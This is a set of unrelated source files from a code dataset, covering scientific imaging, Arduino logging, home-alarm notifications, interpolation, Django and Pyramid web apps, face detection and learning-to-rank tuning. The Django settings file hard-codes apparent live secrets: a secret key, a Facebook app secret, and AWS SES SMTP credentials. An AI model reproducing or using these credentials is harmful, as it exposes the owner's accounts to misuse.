self.variablePlot.plotItem.removeItem(self.variablePlot.plotItem.items[0])\n else:\n self.variablePlot.setImage(fai_img.T)#, levels=[0, 4096])#, autoLevels=False, autoRange=False)\n print(\"Measured display speed: %5.2f fps\" % (1.0 / (time.time() - self.last)))\n self.last = time.time()\n\n\n\n\n\nif __name__ == \"__main__\":\n from optparse import OptionParser\n usage = \"usage: %prog [options] \"\n version = \"%prog \" + pyFAI.version\n description = \"\"\"\n pyFAI-lima is a graphical interface (based on Python/Qt4) to perform azimuthal integration\non a set of files grabbed from a Basler camera using LImA.\"\"\"\n epilog = \"\"\" \"\"\"\n parser = OptionParser(usage=usage, version=version, description=description, epilog=epilog)\n parser.add_option(\"-v\", \"--verbose\",\n action=\"store_true\", dest=\"verbose\", default=False,\n help=\"switch to verbose/debug mode\")\n parser.add_option(\"-p\", \"--poni\",\n dest=\"poni\", default=None,\n help=\"PONI file containing the setup\")\n parser.add_option(\"-j\", \"--json\",\n dest=\"json\", default=None,\n help=\"json file containing the setup\")\n parser.add_option(\"-f\", \"--fps\",\n dest=\"fps\", default=\"30\",\n help=\"Number of frames per seconds\")\n parser.add_option(\"-i\", \"--ip\",\n dest=\"ip\", default=\"192.168.5.19\",\n help=\"IP address of the Basler camera\")\n parser.add_option(\"-l\", \"--lima\",\n dest=\"lima\", default=None,\n help=\"Base installation of LImA\")\n 
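# illustrative invocation (the json filename and output path are examples only):\r\n    #   pyFAI_lima.py --ip 192.168.5.19 --fps 30 -j setup.json hdf5:///tmp/out.h5:/scan\r\n    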
parser.add_option(\"-s\", \"--scan\",\n dest=\"scan\", default=None,\n help=\"Size of scan of the fastest motor\")\n parser.add_option(\"-c\", \"--cake\", action=\"store\", type=\"int\",\n dest=\"cake\", default=0,\n help=\"Perform 2D caking, in so many slices instead of full integration, a reasonable value is 360\")\n\n parser.add_option(\"--no-gui\",\n dest=\"gui\", default=True, action=\"store_false\",\n help=\"Process the dataset without showing the user interface.\")\n\n (options, args) = parser.parse_args()\n if len(args) == 1:\n hurl = args[0]\n if os.path.isdir(hurl):\n #write .dat or .edf files ...\n if options.cake < 2:\n writer = io.AsciiWriter(hurl)\n #Else HDF5\n else:\n if hurl.startswith(\"hdf5:\"):\n hurl = hurl[5:]\n if \":\" in hurl:\n hsplit = hurl.split(\":\")\n hdfpath = hsplit[-1]\n hdffile = \":\".join(hsplit[:-1]) #special windows\n else:\n hdfpath = \"test_LImA+pyFAI\"\n hdffile = hurl\n writer = io.HDF5Writer(hdffile, hdfpath, options.scan)\n elif len(args) > 1 :\n logger.error(\"Specify the HDF5 output file like hdf5:///home/user/filename.h5:/path/to/group\")\n sys.exit(1)\n else:\n writer = None\n\n if options.verbose:\n logger.info(\"setLevel: debug\")\n logger.setLevel(logging.DEBUG)\n if options.lima:\n sys.path.insert(0, options.lima)\n try:\n from Lima import Core, Basler\n\n except ImportError:\n print(\"Is the PYTHONPATH correctly setup? I did not manage to import Lima\")\n sys.exit(1)\n from limaFAI import LinkPyFAI, StartAcqCallback\n if options.gui:\n app = QtGui.QApplication([])\n window = DoubleView(ip=options.ip, fps=options.fps, writer=writer, cake=options.cake)\n #window.set_input_data(args)\n window.show()\n sys.exit(app.exec_())\n else:\n raise Exception(\"No sense!\")\n pass\n","sub_path":"plugins/Lima/pyFAI_lima.py","file_name":"pyFAI_lima.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"585146575","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 18 15:48:48 2016\n\n@author: adamcraycraft\n\"\"\"\n\n#! 
/usr/bin/env python\n\n# Read the output of an Arduino which may be printing sensor output,\n# and at the same time, monitor the user's input and send it to the Arduino.\n# See also\n# http://www.arcfn.com/2009/06/arduino-sheevaplug-cool-hardware.html\n# Runs with runExperiment10.ino \n\nimport os, sys, serial, select, time\nimport numpy as np\nimport pandas as pd\n\ndef v_to_pressure(v):\n\treturn 419.58 * v + 10.818\n\t\ntarray = np.array([])\nparray = np.array([])\t\nstart_time = time.time()\ndate_string = time.strftime(\"%Y%m%d\")\ntry:\n\tos.listdir('/Users/adamcraycraft/Desktop/Research/data/%s' % date_string)\nexcept OSError:\n\tos.mkdir('/Users/adamcraycraft/Desktop/Research/data/%s' % date_string)\n\nclass Arduino() :\n def run(self, baud=9600) :\n # Port may vary, so look for it:\n self.ser = serial.Serial('/dev/cu.usbmodem14201',9600)\n self.ser.flushInput()\n desc = input(\"Enter run description: \")\n #desc = \"Condensing\"\n cmd_log = [(desc + ' START ',time.strftime('%I:%M:%S %p',time.localtime(start_time)))]\n t = 0\n ts = []\n ps = []\n start_string = time.strftime('%I%M%p')\n filling = False\n fill_t = time.time()-3590\n start_t = time.time()\n last_t = 0\n data_file = '/Users/adamcraycraft/Desktop/Research/data/%s/pressure%s.csv' %(date_string, start_string)\n while True:\n inp, outp, err = select.select([sys.stdin, self.ser], [], [], .2)\n# Check for user input:\n if sys.stdin in inp :\n line = sys.stdin.readline()\n if line == \"qt\\n\":\n \tbreak\n self.ser.write(line.encode('utf-8'))\n cmd_log.append((line.strip(),time.ctime(time.time())))\n# check for Arduino output:\n if self.ser in inp :\n counts = float(self.ser.readline().strip())\n t = time.time()\n t_string = time.strftime('%I:%M:%S %p')\n ts.append(t)\n ps.append(counts)\n tarray = np.array(ts)\n parray = np.array(ps)\n data = pd.Series(parray, index = tarray, name = 'voltages (v)')\n data.to_csv(data_file)\n print(counts, t_string)\n if t > start_t + 3600:\n \tstart_t = t\n \tstart_string = time.strftime('%I%M%p')\n \tdata_file = '/Users/adamcraycraft/Desktop/Research/data/%s/pressure%s.csv' %(date_string, start_string)\n \tts = []\n \tps = []\n if t > fill_t + 4500:\n \tline = 'pmp\\n'\n \tself.ser.write(line.encode('utf-8'))\n \tfill_t = t\n \tfilling = True\n if filling and t > fill_t + 60:\n \tline = '\\n'\n \tself.ser.write(line.encode('utf-8'))\n \tfilling = False\n end_comment = input(\"Final Comments? 
\")\n cmd_log.append((end_comment + ' END ', t_string))\n self.ser.close()\n np.savetxt('/Users/adamcraycraft/Desktop/Research/data/%s/cmd_log%s.txt' %(date_string, start_string), cmd_log, fmt = '%s', delimiter = ' ')\n\t\t\n\narduino = Arduino()\ntry :\n if len(sys.argv) > 1 :\n print(\"Using\", sys.argv[1], \"baud\")\n arduino.run(baud=sys.argv[1])\n else :\n arduino.run()\nexcept serial.SerialException :\n print(\"Disconnected (Serial exception)\")\nexcept IOError :\n print(\"Disconnected (I/O Error)\")\nexcept KeyboardInterrupt :\n print(\"Interrupt\")","sub_path":"runExperiment11.py","file_name":"runExperiment11.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"486693130","text":"import appdaemon.appapi as appapi\r\nimport random\r\nimport json\r\n\r\n\r\nclass AlarmReaction(appapi.AppDaemon):\r\n def initialize(self):\r\n self.log(\"Listening for Alarm Triggers....\")\r\n #self.listen_state(self.alarmLights, self.args['alarm_lights'])\r\n #self.listen_state(self.alarmSounds, self.args['alarm_sounds'])\r\n self.listen_event(self.alarmListener, 'state_changed', entity_id = 'alarm_control_panel.house')\r\n self.telegram = self.get_app(\"Telegram\")\r\n self.broadcastStartup(\"RSData Smart Alarm Online\")\r\n\r\n def broadcastStartup (self, message):\r\n adminUsers = self.config['Telegram'][\"groups\"]['admin']['chatids']\r\n for user in adminUsers:\r\n self.call_service(\"telegram_bot/send_message\",\r\n target = user,\r\n message = message)\r\n\r\n def alarmListener(self, event_name, data, kwargs):\r\n self.log(\"<<...\")\r\n self.trigger(data,kwargs)\r\n self.log(\"...>>\")\r\n\r\n def trigger(self, data, kwargs):\r\n #self.log(\"ARMED HOME - <{}> - <{}>\".format(data,kwargs))\r\n new_state = data['new_state']['state']\r\n # activateAction(new_state)\r\n self.log(\"Event Trigger for :{}\".format(str(new_state).upper()))\r\n triggered_by = self.getTriggeredBy(data)\r\n self.log(\"Triggered by :{}\".format(triggered_by['name']))\r\n self.log(\"Notifying\")\r\n self.telegram_notify(new_state, triggered_by)\r\n self.log(\"...>>\")\r\n\r\n def getTriggeredBy(self, data):\r\n triggered_by = data['new_state']['attributes'].get('triggeredBy',None)\r\n self.log(\"TRIGGEDER YBY - {}\".format(triggered_by))\r\n if triggered_by in [list(),None,'','None']:\r\n if data['new_state']['state'] in ['triggered','warning']:\r\n triggered_by = {'name': self.friendly_name(data['new_state']['attributes']['changed_by'])}\r\n else:\r\n triggered_by = {'name':'Web Console'}\r\n else:\r\n triggered_by = json.loads(triggered_by.replace(\"\\'\",\"\\\"\"))\r\n return triggered_by\r\n \r\n def telegram_notify(self,new_state,triggered_by):\r\n telegram_groups = self.config['Telegram'][\"groups\"].items()\r\n count = 0\r\n for user_group in self.args['notify_{}'.format(new_state)]:\r\n for chat_id in self.config['Telegram']['groups'][user_group]['chatids']:\r\n if triggered_by.get('chat_id') != chat_id:\r\n count += 1\r\n self.log(\"[{}] {}\".format(user_group,chat_id))\r\n accessgroup = self.telegram.getAccessGroup(str(chat_id),telegram_groups)\r\n keyboard = self.telegram.getKeyboard(new_state,accessgroup)\r\n self.call_service(\"telegram_bot/send_message\",\r\n target = chat_id,\r\n message = self.getMessage(new_state,triggered_by['name']),\r\n keyboard = keyboard)\r\n self.log(\"{} user(s) successfully notified\".format(count))\r\n\r\n def getMessage(self,new_state,triggered_by_name):\r\n messages = 
{\"armed_home\":\"Alarm ARMED (Stay) by {}\".format(triggered_by_name),\r\n \"armed_away\":\"Alarm ARMED (Away) by {}\".format(triggered_by_name) ,\r\n \"pending\":\"Alarm PENDING ARM by {}\".format(triggered_by_name),\r\n \"warning\":\"{0} Warning by {1}\".format(u'\\U000026a0',triggered_by_name),\r\n \"disarmed\":\"Alarm DISARMED by {}\".format(triggered_by_name),\r\n \"triggered\":\"{0} Alarm TRIGGERED by {1}\".format(u'\\U000026d4',triggered_by_name)}\r\n return messages.get(new_state)\r\n\r\n def alarmLights(self, entity, attribute, old, new, kwargs):\r\n if new == 'on':\r\n self.log(\"LIGHT ALARM ACTIVATED - <{}> - <{}>\".format(entity,new))\r\n self.turn_on(self.args['lights'],True)\r\n else:\r\n self.log(\"LIGHT ALARM DISABLED - <{}> - <{}>\".format(entity,new))\r\n self.turn_on(self.args['lights'],False)\r\n self.log(self.args['lights'])\r\n\r\n def alarmSounds(self, entity, attribute, old, new, kwargs):\r\n if new == 'on':\r\n self.log(\"SOUND ALARM ACTIVATED - <{}> - <{}>\".format(entity,new))\r\n self.audioLoop(self.args['xiaomis'],True)\r\n else:\r\n self.log(\"SOUND ALARM DISABLED - <{}> - <{}>\".format(entity,new))\r\n self.audioLoop(self.args['xiaomis'],False)\r\n \r\n def audioLoop(self, xiaomis, repeat):\r\n for xiaomi in xiaomis:\r\n self.log(\"XIAOMI!!\")\r\n self.call_service(\"xiaomi/play_ringtone\", gw_mac = xiaomi.get('gw_mac'), ringtone_id = xiaomi.get('ringtone_id'), ringtone_vol = xiaomi.get('ringtone_vol'))\r\n if repeat==True:\r\n if self.get_state('input_boolean.alarm_sounds') == 'on':\r\n pass#self.run_in(self.audioLoop(xiaomis,repeat),20)\r\n else:\r\n for xiaomi in xiaomis:\r\n self.log(\"XIAOMI STOP!!\")\r\n self.call_service(\"xiaomi/stop_ringtone\", gw_mac = xiaomi.get('gw_mac'))\r\n\r\n def turn_on(self, lights, repeat):\r\n strobeLights = []\r\n rgbwLights = []\r\n for light in self.args['lights']: \r\n self.log(\"LIGGHT - <{}> - <{}>\".format(light.get('entity_id'),light.get('effect')))\r\n if light.get('effect') is not None:\r\n rgbwLights.append(light['entity_id'])\r\n self.call_service(\"light/turn_on\", entity_id = light.get('entity_id'), effect = light.get('effect'))\r\n else:\r\n strobeLights.append(light['entity_id'])\r\n self.call_service(\"homeassistant/turn_on\", entity_id = strobeLights)\r\n if repeat == True:\r\n if self.get_state('input_boolean.alarm_lights') == 'on':\r\n self.turn_off(strobeLights)\r\n else:\r\n self.call_service(\"light/turn_on\", entity_id = rgbwLights, effect = \"Stop\")\r\n\r\n def turn_off(self, lights):\r\n self.log(\"OFF - {}\".format(lights))\r\n self.call_service(\"homeassistant/turn_off\", entity_id = lights)\r\n self.turn_on(lights, True)\r\n","sub_path":"alarm.py","file_name":"alarm.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"302515042","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\ndosya=open(\"lagrange.txt\")\ndegerler = []\n\nfor line in dosya.readlines():\n line = line.rstrip('\\n').split(' ')\n degerler.append(line)\ndosya.close()\n\nx = float(input(\"hangi değerin hesaplanmasını istiyorsunuz: \"))\nlimit = len(degerler[0])\ntoplam = 0.0\nfor i in range(limit):\n k = 1.0\n l = 1.0\n for j in range(limit):\n if(i != j):\n k = k*(x-float(degerler[0][j]))\n l = l*(float(degerler[0][i])-float(degerler[0][j]))\n toplam = 
float(toplam+(k/l)*float(degerler[1][i]))\nprint(toplam)\n\n\n\n\n\n","sub_path":"lagrange.py","file_name":"lagrange.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"87497666","text":"import os\nimport environ\nfrom django.utils import six\nROOT_DIR = environ.Path(__file__) - 3 # (/a/b/myfile.py - 3 = /)\nAPPS_DIR = ROOT_DIR.path('misrutasmx')\n# SECURITY WARNING: keep the secret key used in production secret!\n# ------------------------------------------------------------------------------\nSECRET_KEY = 'x*i5)0^idki5oct&q!+hto7%dwq4)2kb^-*ed3l=53e3k4$rp!'\n# Debug\n# ------------------------------------------------------------------------------\nDEBUG = True\n# Allowed Host\n# ------------------------------------------------------------------------------\nALLOWED_HOSTS = []\n# Application definition\n# ------------------------------------------------------------------------------\nDJANGO_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n # Useful template tags:\n 'django.contrib.humanize',\n 'django.contrib.sites',\n)\nTHIRD_PARTY_APPS = (\n 'crispy_forms', # Form layouts\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n 'allauth.socialaccount.providers.facebook',\n 'storages',\n 'collectfast',\n)\n# Apps specific for this project go here.\nLOCAL_APPS = (\n # Your stuff: custom apps go here\n 'project.app',\n 'django_facebook',\n)\nFACEBOOK_APP_ID = '470579373130409'\nFACEBOOK_APP_SECRET = '1ee7911efd6231d8bcc9a4e51aee14c2'\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps\nINSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n# MIDDLEWARE CONFIGURATION\n# ------------------------------------------------------------------------------\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n)\nROOT_URLCONF = 'config.urls'\n# TEMPLATE CONFIGURATION\n# ------------------------------------------------------------------------------\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n str(APPS_DIR.path('templates')),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'project.app.context_processors.globalvar',\n\n 'django_facebook.context_processors.facebook',\n ],\n },\n },\n]\nSITE_ID = 1\n# ALLAUTH CONFIGURATION\n# ------------------------------------------------------------------------------\n# http://django-allauth.readthedocs.org/en/latest\nAUTHENTICATION_BACKENDS = (\n # Needed to login by username in Django admin, regardless of `allauth`\n 
'django.contrib.auth.backends.ModelBackend',\n # `allauth` specific authentication methods, such as login by e-mail\n 'allauth.account.auth_backends.AuthenticationBackend',\n)\n# Some really nice defaults\nACCOUNT_AUTHENTICATION_METHOD = 'username_email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'none'\n# Custom user app defaults\n# Select the correct user model\nAUTH_USER_MODEL = 'app.User'\nLOGIN_REDIRECT_URL = 'index'\nLOGIN_URL = 'landing'\nSOCIALACCOUNT_QUERY_EMAIL = True\nSOCIALACCOUNT_PROVIDERS = \\\n {'facebook':\n {\n 'METHOD': 'oauth2',\n 'SCOPE': \n [\n 'email', 'public_profile', 'user_friends'\n ],\n 'AUTH_PARAMS': \n {\n 'auth_type': 'reauthenticate'\n },\n 'FIELDS': \n [\n 'id',\n 'email',\n 'name',\n 'first_name',\n 'last_name',\n 'verified',\n 'locale',\n 'timezone',\n 'link',\n 'gender',\n 'updated_time'\n ],\n 'EXCHANGE_TOKEN': True,\n 'LOCALE_FUNC': 'path.to.callable',\n 'VERIFIED_EMAIL': False,\n 'VERSION': 'v2.4'\n }\n }\n# CRISPY TEMPLATE\n# ------------------------------------------------------------------------------\n# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs\nCRISPY_TEMPLATE_PACK = 'bootstrap3'\nWSGI_APPLICATION = 'config.wsgi.application'\n# DATABASE CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'misrutasmx.sqlite3',\n 'USER': 'eadmailmx',\n 'PASSWORD': '',\n 'HOST': 'localhost',\n 'PORT': '',\n }\n}\nDATABASES['default']['ATOMIC_REQUESTS'] = True\n# Internationalization\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/1.8/topics/i18n/\nLANGUAGE_CODE = 'es-MX'\nTIME_ZONE = 'America/Mexico_City'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n# Static files (CSS, JavaScript, Images)\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/1.8/howto/static-files/\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (\n str(APPS_DIR.path('static')),\n)\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n# MEDIA CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root\nMEDIA_ROOT = str(APPS_DIR('media'))\nMEDIA_URL = '/media/'\n# Mail settings\n# ------------------------------------------------------------------------------\nDEFAULT_FROM_EMAIL = 'MisRutasMX ' #CHANGEME!!!#\nEMAIL_HOST = 'email-smtp.us-east-1.amazonaws.com' #CHANGEME!!!#\nEMAIL_HOST_USER = 'AKIAJ2P4EII4LYULTB4Q' #CHANGEME!!!#\nEMAIL_HOST_PASSWORD = 'Agws0vyhjAsulzVNQsNb+LueMx4AEGYw/jPZyEMTtkQD' #CHANGEME!!!#\nEMAIL_PORT = 587 #CHANGEME!!!#\nEMAIL_USE_TLS = True #CHANGEME!!!#\nEMAIL_SUBJECT_PREFIX = '[MisRutasMX]' #CHANGEME!!!#\n# Celery\n# ------------------------------------------------------------------------------\n#INSTALLED_APPS += ('project.taskapp.celery.CeleryConfig',)\n# if you are not using the django database broker (e.g. 
rabbitmq, redis, memcached), you can remove the next line.\nINSTALLED_APPS += ('kombu.transport.django',)\nBROKER_URL = 'django://'\n# LOCAL CONFIGURATION\n# ------------------------------------------------------------------------------\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': ''\n }\n}\nINSTALLED_APPS += ('django_extensions', )\n# SLUGLIFIER\n# ------------------------------------------------------------------------------\nAUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'\n# VARIABLES\n# ------------------------------------------------------------------------------\nAPPTITLE = 'MisRutas.MX'\nTEXTTITLE = 'MisRutas.MX'\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins','console'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'django_facebook.models': {\n 'handlers': ['mail_admins','console'],\n 'level': 'ERROR',\n 'propagate': True,\n }\n }\n}\n\ntry:\n from .var_production import *\n from boto.s3.connection import OrdinaryCallingFormat\n # See: http://django-storages.readthedocs.org/en/latest/index.html\n # Static and Media Storage\n AWS_ACCESS_KEY_ID = VAR_DJANGO_AWS_ACCESS_KEY_ID\n AWS_SECRET_ACCESS_KEY = VAR_AWS_SECRET_ACCESS_KEY\n AWS_STORAGE_BUCKET_NAME = VAR_AWS_STORAGE_BUCKET_NAME\n AWS_AUTO_CREATE_BUCKET = True\n AWS_QUERYSTRING_AUTH = False\n AWS_S3_CALLING_FORMAT = OrdinaryCallingFormat()\n # AWS cache settings, don't change unless you know what you're doing:\n AWS_EXPIRY = 60 * 60 * 24 * 7\n # TODO See: https://github.com/jschneier/django-storages/issues/47\n # Revert the following and use str after the above-mentioned bug is fixed in\n # either django-storage-redux or boto\n AWS_HEADERS = {\n 'Cache-Control': six.b('max-age=%d, s-maxage=%d, must-revalidate' % (\n AWS_EXPIRY, AWS_EXPIRY))\n }\n # URL that handles the media served from MEDIA_ROOT, used for managing stored files.\n DEFAULT_FILE_STORAGE = 'config.s3utils.MediaRootS3BotoStorage'\n MEDIA_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME\n MEDIA_ROOT = str(ROOT_DIR('misrutasmx/media'))\n # Static Assests\n # ------------------------\n STATICFILES_STORAGE = 'config.s3utils.StaticRootS3BotoStorage'\n STATIC_URL = 'https://s3.amazonaws.com/%s/static/' % AWS_STORAGE_BUCKET_NAME\n # See: https://github.com/antonagestam/collectfast\n # For Django 1.7+, 'collectfast' should come before 'django.contrib.staticfiles'\n AWS_PRELOAD_METADATA = True\n FACEBOOK_APP_ID = VAR_FACEBOOK_APP_ID\n FACEBOOK_APP_SECRET = VAR_FACEBOOK_APP_SECRET\nexcept:\n pass","sub_path":"config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":10205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"349232772","text":"from pyramid.config import Configurator\nfrom pyramid.authentication import AuthTktAuthenticationPolicy\nfrom pyramid.authorization import ACLAuthorizationPolicy\nfrom pyramid.security import Authenticated, Allow\nfrom sqlalchemy import engine_from_config\nfrom .views import logout\nfrom .utils import get_user\nfrom .models import DBSession, Base\n\n\nclass Root(object):\n __acl__ = [\n (Allow, 
Authenticated, 'view'),\n ]\n\n def __init__(self, request):\n self.request = request\n\n\ndef main(global_config, **settings):\n \"\"\" This function returns a Pyramid WSGI application.\n \"\"\"\n engine = engine_from_config(settings, 'sqlalchemy.')\n DBSession.configure(bind=engine)\n Base.metadata.bind = engine\n authn_policy = AuthTktAuthenticationPolicy('sosecret')\n authz_policy = ACLAuthorizationPolicy()\n config = Configurator(\n settings=settings,\n root_factory=Root,\n )\n config.set_authentication_policy(authn_policy)\n config.set_authorization_policy(authz_policy)\n config.set_default_permission('view')\n config.add_forbidden_view(view=logout)\n config.add_static_view('static', 'static', cache_max_age=3600)\n config.add_request_method(get_user, 'user', reify=True)\n config.add_route('home', '/')\n config.add_route('search_result', '/search_result')\n config.add_route('login', '/login')\n config.add_route('logout', '/logout')\n config.add_route('register', '/register')\n config.add_route('history', '/history')\n config.add_route('history_refresh', '/history_refresh')\n config.add_route('top', '/top')\n config.scan()\n return config.make_wsgi_app()\n","sub_path":"pyramidaplication/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"312670164","text":"input_file = open(\"input.txt\", \"r\")\ntext = input_file.read()\nfloor = 0\nposition = 0\n\nfor i, char in enumerate(text):\n if char == \"(\":\n floor += 1\n else:\n floor -= 1\n\n if floor == -1:\n position = i + 1\n break\n\ninput_file.close()\nprint(position)\n","sub_path":"2015/day 1/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"190127109","text":"import cv2\r\n\r\nclass Camera:\r\n\r\n def __init__(self, cameraNumber, path='haarcascade_frontalface_default.xml', window='videoWindow'):\r\n self.videoCapture = cv2.VideoCapture(cameraNumber)\r\n self.pathXML = path\r\n self.classfier = cv2.CascadeClassifier(self.pathXML)\r\n self.window = window\r\n cv2.namedWindow(self.window)\r\n cv2.moveWindow(self.window, 0, 0)\r\n\r\n def getCameraFrame(self):\r\n boolReturn, frame = self.videoCapture.read()\r\n return boolReturn, frame\r\n\r\n def showFrame(self, frame):\r\n cv2.imshow(self.window, frame)\r\n\r\n def cleanup(self):\r\n self.videoCapture.release()\r\n cv2.destroyAllWindows()\r\n\r\n def detectFaces(self, frame):\r\n # global previousX, previousY, minXX, minYY\r\n\r\n cascade = self.classfier\r\n image_copy = frame.copy()\r\n\r\n # convert the test image to gray scale as opencv face detector expects gray images\r\n gray_image = cv2.cvtColor(image_copy, cv2.COLOR_BGR2GRAY)\r\n\r\n # Applying the haar classifier to detect faces\r\n facesDetected = cascade.detectMultiScale(gray_image, scaleFactor = 2, minNeighbors = 5)\r\n\r\n #minimumdistance = 800\r\n\r\n centers = []\r\n\r\n if len(facesDetected) != 0:\r\n print(facesDetected)\r\n for (x, y, w, h) in facesDetected:\r\n cv2.rectangle(image_copy, (x, y), (x + w, y + h), (0, 255, 100), 5)\r\n\r\n # Center of the rectangle\r\n cv2.line(image_copy, (x + int(1 / 2 * w), y + int(1 / 2 * h)), (x + int(1 / 2 * w), y + int(1 / 2 * h)),\r\n (0, 0, 255), 7)\r\n\r\n xx = x + int(1 / 2 * w)\r\n yy = y + int(1 / 2 * h)\r\n centers.append((xx, yy))\r\n\r\n return image_copy, centers\r\n 
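# A minimal usage sketch for the Camera class above: a read-detect-show loop.
# The webcam index 0 and the 'q' quit key are assumptions for illustration,
# not values taken from the original module.
if __name__ == '__main__':
    cam = Camera(0)
    while True:
        ok, frame = cam.getCameraFrame()
        if not ok:  # the camera read failed, so stop the loop
            break
        annotated, centers = cam.detectFaces(frame)
        cam.showFrame(annotated)
        if cv2.waitKey(1) & 0xFF == ord('q'):  # press 'q' to quit
            break
    cam.cleanup()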
\r\n","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"573681873","text":"# Stronger baseline: Listwise L2R - LambdaMART\n# Hyperparameter optimziation HPonsteroids requires Python 3!\n\n\n# In[2]:\n\n\n# Imports\nimport os\nimport subprocess\nimport sys\n\n# HPO\n\n\nimport ConfigSpace as CS\nimport ConfigSpace.hyperparameters as CSH\n\nfrom hpbandster.core.worker import Worker\n\nimport logging\nlogging.basicConfig(level=logging.WARNING)\n\n# HPO server and stuff\n\n# import logging\n# logging.basicConfig(level=logging.WARNING)\n\nimport argparse\n\nimport hpbandster.core.nameserver as hpns\nimport hpbandster.core.result as hpres\n\nfrom hpbandster.optimizers import BOHB as BOHB\nfrom hpbandster.optimizers import RandomSearch as RS\nfrom hpbandster.examples.commons import MyWorker\n\n\n# In[2]:\n\n\n# In[3]:\n\n\n# Functions\ndef generate_run_file(pre_run_file, run_file):\n \n with open(pre_run_file, 'rt') as input_f:\n pre_run = input_f.readlines()\n# print('Aqui veo si genero o no el run file: ',type(pre_run))\n with open(run_file, 'wt') as out_f:\n for line in pre_run:\n out_f.write(line.replace('docid=','').replace('indri', 'lambdaMART'))\n \n\n\n# In[4]:\n\n\n# Classes\nclass L2Ranker:\n def __init__(self, ranklib_location, params, test_data_file, normalization=[]):\n self.ranklib_location = ranklib_location\n # Works with Oracle JSE\n # java version \"1.8.0_211\"\n # Java(TM) SE Runtime Environment (build 1.8.0_211-b12)\n # Java HotSpot(TM) 64-Bit Server VM (build 25.211-b12, mixed mode)\n self.params = params\n self.log_file = ''\n self.ranker_command = ['java', '-jar', ranklib_location + 'RankLib-2.12.jar']\n self.normalization = normalization\n self.test_data_file = test_data_file\n self.save_model_file = ''\n \n# def build(self, ir_tool_params):\n def train(self, train_data_file, save_model_file, config):\n self.save_model_file = save_model_file\n self.log_file = save_model_file + '.log'\n toolkit_parameters = [\n *self.ranker_command, # * to unpack list elements\n '-train',\n train_data_file,\n *self.normalization,\n *self.params,\n# *self.params[2:], # [2:] To suppress the validation process during training\n '-leaf', \n str(config['n_leaves']),\n '-shrinkage',\n str(config['learning_rate']),\n '-tree', # One regression tree per boosted iteration\n str(config['n_trees']),\n '-save',\n self.save_model_file \n ] \n \n print(toolkit_parameters)\n with open(self.log_file, 'wt') as rf:\n proc = 